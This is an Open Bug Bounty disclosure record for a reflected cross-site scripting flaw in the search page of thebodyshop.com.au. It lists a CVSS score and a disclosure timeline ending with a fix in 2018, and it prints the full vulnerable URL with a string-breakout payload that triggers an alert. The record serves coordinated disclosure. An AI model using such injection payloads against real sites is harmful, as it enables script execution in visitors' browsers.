thebodyshop.com.au XSS vulnerability

2017-12-20T05:48:00
ID OBB:455865
Type openbugbounty
Reporter jimcola99
Modified 2018-03-31T08:53:00

Description

Open Bug Bounty ID: OBB-455865

Description| Value
---|---
Affected Website:| thebodyshop.com.au
Vulnerable Application:| Custom Code
Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79
CVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N]
Remediation Guide:| OWASP XSS Prevention Cheat Sheet

Vulnerable URL:
http://www.thebodyshop.com.au/search?q=aids');})();alert('openbugbounty');(function() {var w = window, d = document;var s = d.createElement('script');s.setAttribute('async', 'true');s.setAttribute('type', 'text/javascript');s.setAttribute('src', '//c1.rfihub.net/js/tc.min.js');var f = d.getElementsByTagName('script')[0];f.parentNode.insertBefore(s, f);if (typeof w['_rfi'] !== 'function') {w['_rfi']=function() {w['_rfi'].commands = w['_rfi'].commands || [];w['_rfi'].commands.push(arguments);};}_rfi('setArgs', 'ver', '9');_rfi('setArgs', 'rb', '28040');_rfi('setArgs', 'ca', '20749683');_rfi('setArgs', 't', 'srp');_rfi('setArgs', 'q', 'aid&submit;=

Coordinated Disclosure Timeline

Description| Value
---|---
Vulnerability Reported:| 20 December, 2017 05:48 GMT
Vulnerability Verified:| 20 December, 2017 05:50 GMT
Website Operator Notified:| 20 December, 2017 05:50 GMT
Vulnerability Published:| 20 December, 2017 05:50 GMT [without any technical details]
Vulnerability Fixed:| 31 March, 2018 08:53 GMT
Public Disclosure:| 31 March, 2018 08:53 GMT